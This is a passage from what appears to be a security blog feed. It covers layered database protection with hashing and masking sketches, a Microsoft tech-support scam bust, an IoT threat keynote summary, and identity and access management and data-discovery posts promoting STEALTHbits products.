Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).
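
As a concrete sketch of the difference between hashing and encryption at this layer (shown in SQL with the pgcrypto extension; the users table and its columns are hypothetical, and the same logic typically lives in application code): passwords get a one-way salted hash, and a login check simply recomputes the hash with the stored salt:

  CREATE EXTENSION IF NOT EXISTS pgcrypto;
  -- Store only a salted bcrypt hash, never the plaintext password
  INSERT INTO users (username, password_hash)
  VALUES ('alice', crypt('correct horse battery staple', gen_salt('bf', 12)));
  -- Verify at login: recompute the hash using the stored value as salt
  SELECT password_hash = crypt('correct horse battery staple', password_hash) AS password_ok
  FROM users WHERE username = 'alice';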

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked or replaced before it was ever made available (a masking sketch follows below). And if it was a production database, encryption and access-control protections that stay with the database during export, or when the file is moved off an encrypted volume, should have been applied. The data should have been protected before the vendor's analyst ever got their hands on it. Oracle Database Vault would have prevented even a DBA-type user from accessing the sensitive user data exposed here. These are not new technologies; they've been around for many years, with plentiful documentation and industry awareness.
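For the non-production case, here's a minimal masking sketch. The field names and formats are hypothetical; a real static-data-masking tool preserves referential integrity and format constraints far more carefully.

```python
# Static data masking for a non-production copy: replace sensitive values
# with realistic-looking fakes before the data leaves production.
# Field names are hypothetical; illustration only.
import random

def fake_ssn() -> str:
    # the 900-999 area-number range is never issued as a real SSN
    return f"900-{random.randint(10, 99)}-{random.randint(1000, 9999)}"

def mask_row(row: dict) -> dict:
    masked = dict(row)
    masked["ssn"] = fake_ssn()
    masked["email"] = f"user{random.randint(1, 999_999)}@example.com"
    return masked

production_row = {"id": 42, "ssn": "078-05-1120", "email": "jane@corp.example"}
print(mask_row(production_row))  # safe to hand to a vendor's analyst
```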

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings that it proves the cloud is less secure than on-premises deployments. I don't agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and offer layered security controls beyond what their own data centers provide. And it's about more than selecting the right Cloud Service Provider: you also need to choose the right service, one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it's easy and low cost, ease of use and cost are not always the most important factors. When sensitive data is involved, security needs to be weighed heavily in service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.). Specific techniques or advantages mentioned may not apply to other vendors' similar solutions.

2016 broke security records, but 2017 is on track to be worse

It’s no secret that 2016 was a tough year for security and IT pros. From reported security issues behind the U.S. election to the Beautiful People hack, the year was plagued by countless breaches that …


Will you pay $300 and allow scamsters remote control of your computer? Child's play for this BPO

Microsoft customers in Arizona were scammed by a BPO set up by fraudsters, whose executives represented themselves as Microsoft employees and convinced victims that, for a $300 charge, they would enhance the performance of their desktop computers.

Once a customer signed up, a BPO technician logged on using remote access software that provided full control over the desktop, then deleted trash and cache files, sometimes scanning for personal information along the way. The unsuspecting customer ended up with a marginal improvement in performance. After one year of operation, the Indian police nabbed the three men behind the operation and eleven of their employees.

Several aspects of this case (“Pune BPO which cheated Microsoft clients in the US busted”) struck me as interesting:

1) The ease with which customers were convinced to part with money and to allow an unknown third party to take remote control of their computers. With remote control, one can also install malicious files that act as a remote backdoor or spyware, leaving the machine vulnerable.
2) The criminals had in their possession a list of one million Microsoft customers with updated contact information.
3) The good fortune that the Indian government is unsympathetic to cybercrime both within and beyond its shores, which resulted in the arrests. In certain other countries, crimes like these continue unhindered.

Cybercitizens should ensure that they do not surrender remote access to their computers or install software unless it comes from a trusted source.


5 things you need to know about securing our future

“Securing the future” is a huge topic, but our Chief Research Officer Mikko Hypponen narrowed it down to the two most important issues in his recent keynote address at the CeBIT conference. Watch the whole thing for a Matrix-like immersion into the two greatest needs for a brighter future: security and privacy.

To get started, here are some quick takeaways from Mikko's insights into data privacy and data security in a threat landscape where everyone is being watched, everything is getting connected, and anything that can make criminals money will be attacked.

1. Criminals are using the affiliate model.
About a month ago, one of the guys running CTB Locker (ransomware that infects your PC and holds your files until you pay to release them in bitcoin) did a Reddit AMA to explain how he makes around $300,000 with the scam. After a bit of questioning, the poster revealed that he isn't CTB's author but an affiliate who simply pays for access to a trojan and an exploit kit created by a Russian gang.

“Why are they operating with an affiliate model?” Mikko asked.

Because now the authors are most likely not breaking the law. Among the more than 250,000 samples F-Secure Labs processes each day, our analysts have seen similar affiliate models used with the largest banking trojans and with GameOver ZeuS, which, he notes, also come from Russia.

No wonder online crime is the most profitable IT business.

2. “Smart” means exploitable.
When you think of the word “smart” (as in smart TV, smartphone, smart watch, smart car), Mikko suggests you think of the word “exploitable,” because every smart device is a target for online criminals.

Why would the emerging Internet of Things (IoT) be a target? Think of the motives, he says. Money, of course. You don't need to worry about your smart refrigerator being hacked until there's a way to make money off it.

How might the IoT become a profit center? Imagine, he suggests, if a criminal hacked your car and wouldn't let you start it until you paid a ransom. We haven't seen this yet, but if it can be done, it will be.

3. Criminals want your computer power.
Even if criminals can't get you to pay a ransom, they may still want into your PC, watch, or fridge for the computing power. The denial-of-service attack against Xbox Live and PlayStation Network last Christmas, for instance, likely employed a botnet that included mobile devices.

IoT devices have already been hijacked to mine for cryptocurrencies that could be converted to Bitcoin, then dollars, or “even more stupidly into rubles.”

4. If we want to solve the problems of security, we have to build security into devices.
Knowing that almost everything will be able to connect to the internet requires better collaboration between security vendors and manufacturers. Mikko worries that companies that have never had to think about security (a toaster manufacturer, for instance) are now getting into the IoT game. And given that the cheapest devices sell best, they won't invest in proper security design.

5. Governments are a threat to our privacy.
The success of the internet has led to governments increasingly using it as a tool of surveillance. What concerns Mikko most is the idea of “collecting it all.” As Glenn Greenwald and Edward Snowden pointed out at CeBIT the day before Mikko spoke, governments seem to be collecting everything (communications, location data) on everyone, just in case, even if you are not a person of interest.

Who knows how that information may be used a decade from now, given that we all have something to hide?

Cheers,

Sandra


Deep Data Governance

One of the first things to catch my eye this week at RSA was a press release from STEALTHbits on their latest Data Governance release. They're a long-time player in DG, and as a former employee, I know them fairly well. Where they're taking DG is pretty interesting.

The company has recently merged its enterprise Data (files/folders) Access Governance technology with its DLP-like ability to locate sensitive information. The combined solution enables you to locate servers, identify file shares, assess share and folder permissions, lock down access, review file content to identify sensitive information, monitor for suspicious activity, and provide an audit trail of access to high-risk content.

The STEALTHbits solution is pragmatic because you can tune where it looks, how deep it crawls, where you want content scanning, where you want monitoring, and so on. I believe the solution is unique in the market, and a number of IAM vendors agree, having chosen STEALTHbits as a partner of choice for feeding Data Governance information into their Enterprise Access Governance solutions.

Learn more at the STEALTHbits website.

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see: OS updates and security patches are slow to arrive, and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and apps. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are, on whatever device they're using. The challenge, then, is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is already antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with BlackBerry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access, which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate mobile device use-cases. There's no reason to manage mobile device access differently from desktop access: it's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate provisioning mobile apps and data rights, just as they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access to (and providing SSO for) cloud services. A number of niche vendors have even popped up offering that as their primary value proposition. But the core technologies behind these stand-alone solutions are nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. There's no magic to delivering SSO to SaaS apps; in fact, it's typically easier than SSO to enterprise apps, because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.). The sketch below shows the kind of token validation at the heart of it.
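As a flavor of how little magic there is, here's a minimal token-validation sketch, shown JWT/OIDC-style rather than SAML for brevity. The issuer, audience, and key are hypothetical, and it assumes the PyJWT package.

```python
# The heart of federated SSO: the SaaS side verifies a signed token from
# the enterprise IdP instead of holding a local password. JWT/OIDC-style
# shown for brevity; SAML assertions follow the same trust model.
# Hypothetical issuer/audience/key; requires the PyJWT package.
import jwt  # PyJWT

IDP_PUBLIC_KEY = "-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----"

def validate_sso_token(token: str) -> dict:
    """Returns the identity claims if the IdP's signature and claims check out."""
    return jwt.decode(
        token,
        IDP_PUBLIC_KEY,
        algorithms=["RS256"],
        audience="https://saas.example.com",
        issuer="https://idp.example.com",
    )

# claims = validate_sso_token(incoming_token)
# print(claims["sub"], claims["email"])
```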

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One identity, one platform. I wouldn't stand up an IDaaS solution just to get SSO to cloud apps, and I wouldn't introduce an MDM vendor just to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new, and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols (a minimal sketch follows). And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (especially valuable for consumer-facing apps).
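Here's a minimal sketch of that gateway pattern using Flask; the mainframe fetch is a hypothetical stand-in for whatever terminal, MQ, or screen-scrape integration sits behind a real gateway product.

```python
# Minimal API-gateway sketch: a REST front end over a legacy data source.
# Flask and fetch_from_mainframe are illustrative stand-ins, not a
# specific vendor's gateway.
from flask import Flask, jsonify

app = Flask(__name__)

def fetch_from_mainframe(account_id: str) -> dict:
    """Hypothetical adapter for the legacy system (MQ, 3270, etc.)."""
    return {"account": account_id, "balance": "1024.00"}

@app.get("/accounts/<account_id>")
def account(account_id: str):
    # in practice, this layer also enforces authN/authZ and rate limits
    return jsonify(fetch_from_mainframe(account_id))

if __name__ == "__main__":
    app.run()
```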

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.

Virtual Directory as Database Security

I've written plenty of posts about the various use-cases for virtual directory technology over the years. But, I came across another today that I thought was pretty interesting.

Think about enterprise security from the viewpoint of the CISO. There are numerous layers of overlapping security technologies that work together to reduce risk to a point that's comfortable. Network security, endpoint security, identity management, encryption, DLP, SIEM, etc. But even when these solutions are implemented according to plan, I still see two common gaps that need to be taken more seriously.

One is control over unstructured data (file systems, SharePoint, etc.). The other is back-door access to application databases. A ton of sensitive information is exposed through those two avenues and isn't protected by the likes of SIEM solutions or IAM suites. Even DLP solutions tend to focus on perimeter defense rather than on who has access. STEALTHbits has solutions that fill the gaps for unstructured data and for Microsoft SQL Server, so I spend a fair amount of time talking to CISOs and their teams about these issues.

While reading through some IAM industry materials today, I found an interesting write-up on how Oracle is using its virtual directory technology to solve this problem for Oracle database customers. Oracle's IAM suite leverages Oracle Virtual Directory (OVD) as an integration point with an Oracle database feature called Enterprise User Security (EUS). EUS enables database access management through an enterprise LDAP directory (as opposed to managing a spaghetti mapping of users to database accounts and their associated permissions).

By placing OVD in front of EUS, you get instant LDAP-style management (and IAM integration) without a long, complicated migration process. It's a pretty compelling use-case. If you can't control direct database permissions, your application-side access controls matter a lot less: essentially, you've locked the front door but left the back window wide open. Something to think about. The sketch below shows the kind of directory lookup this model centralizes.
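To make the LDAP-centric model concrete, here's a minimal directory lookup sketch with the ldap3 package; the server, DNs, and attribute names are hypothetical. The point is that one enterprise directory entry, rather than a per-database account, decides what the user can do.

```python
# One enterprise directory entry drives database access, instead of a
# per-database account mapping. Server, DNs, and attributes here are
# hypothetical; requires the ldap3 package.
from ldap3 import Server, Connection

server = Server("ldaps://directory.example.com")
conn = Connection(server,
                  user="cn=dbauth,ou=services,dc=example,dc=com",
                  password="service-password",  # illustrative only
                  auto_bind=True)

# group membership (memberOf) is what maps to a database-side role
conn.search("ou=people,dc=example,dc=com",
            "(uid=jdoe)",
            attributes=["cn", "memberOf"])

for entry in conn.entries:
    print(entry.entry_dn, entry.memberOf)
```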

Game-Changing Sensitive Data Discovery

I've tried not to let my blog become a place where I push products made by my employer. It just doesn't feel right and I'd probably lose some portion of my audience. But I'm making an exception today because I think we have something really compelling to offer. Would you believe me if I said we have game-changing DLP data discovery?

How about a data discovery solution that costs nothing to install? No infrastructure and no licensing. How about a solution that you can point at specific locations, with specific criteria to look for, and get results back in minutes? How about a solution that profiles file shares according to risk, so you can target your scans according to need? And if you find sensitive content, you can unlock the details using credits, which are bundle-priced.

Game changing. Not because it's the first or only solution that can find sensitive data (credit card info, national ID numbers, health information, financial docs, etc.), but because it's so accessible. Because you can have answers minutes after downloading, and you can get a sense of your problem before you pay a dime. There are even free credits to let you test the waters for a while. (For the curious, the sketch below shows the basic pattern-matching idea behind this kind of discovery.)
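Here's a minimal pattern-based discovery sketch. The regexes and path are illustrative and far cruder than a real scanner, which adds checksum validation (e.g., Luhn for card numbers), file-type parsing, and risk profiling.

```python
# Minimal sensitive-data discovery: walk a directory tree and count
# pattern matches per file. Patterns and path are illustrative; a real
# scanner validates matches (Luhn checks, context) to cut false positives.
import re
from pathlib import Path

PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def scan(root: str):
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="ignore")
        for label, pattern in PATTERNS.items():
            count = len(pattern.findall(text))
            if count:
                yield path, label, count

for path, label, count in scan("/shares/finance"):
    print(f"{path}: {count} possible {label} value(s)")
```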

But don't take our word for it. Here are a few of my favorite quotes from early adopters: 
“You seem to have some pretty smart people there, because this stuff really works like magic!”

"StealthSEEK is a million times better than [competitor]."

"We're scanning a million files per day with no noticeable performance impacts."

"I love this thing."

StealthSEEK has already found numerous examples of system credentials, health information, financial docs, and other sensitive information that wasn't previously known about.

If I've piqued your interest, give StealthSEEK a chance to find sensitive data in your environment. I'd love to hear what you think. If you can give me an interesting use-case, I can probably smuggle you a few extra free credits. Let me know.



Data Protection ROI

I came across a couple of interesting articles today related to ROI on data protection. I recently wrote a whitepaper for STEALTHbits on the cost justification of Data Access Governance. It's often top of mind for security practitioners who know they need help but have trouble justifying the acquisition and implementation costs of related solutions. Here are today's links:

KuppingerCole -
The value of information – the reason for information security

Verizon Business Security -
Ask the Data: Do “hacktivists” do it differently?

Visit the STEALTHbits site for information on Access Governance related to unstructured data and to track down the paper on cost justification.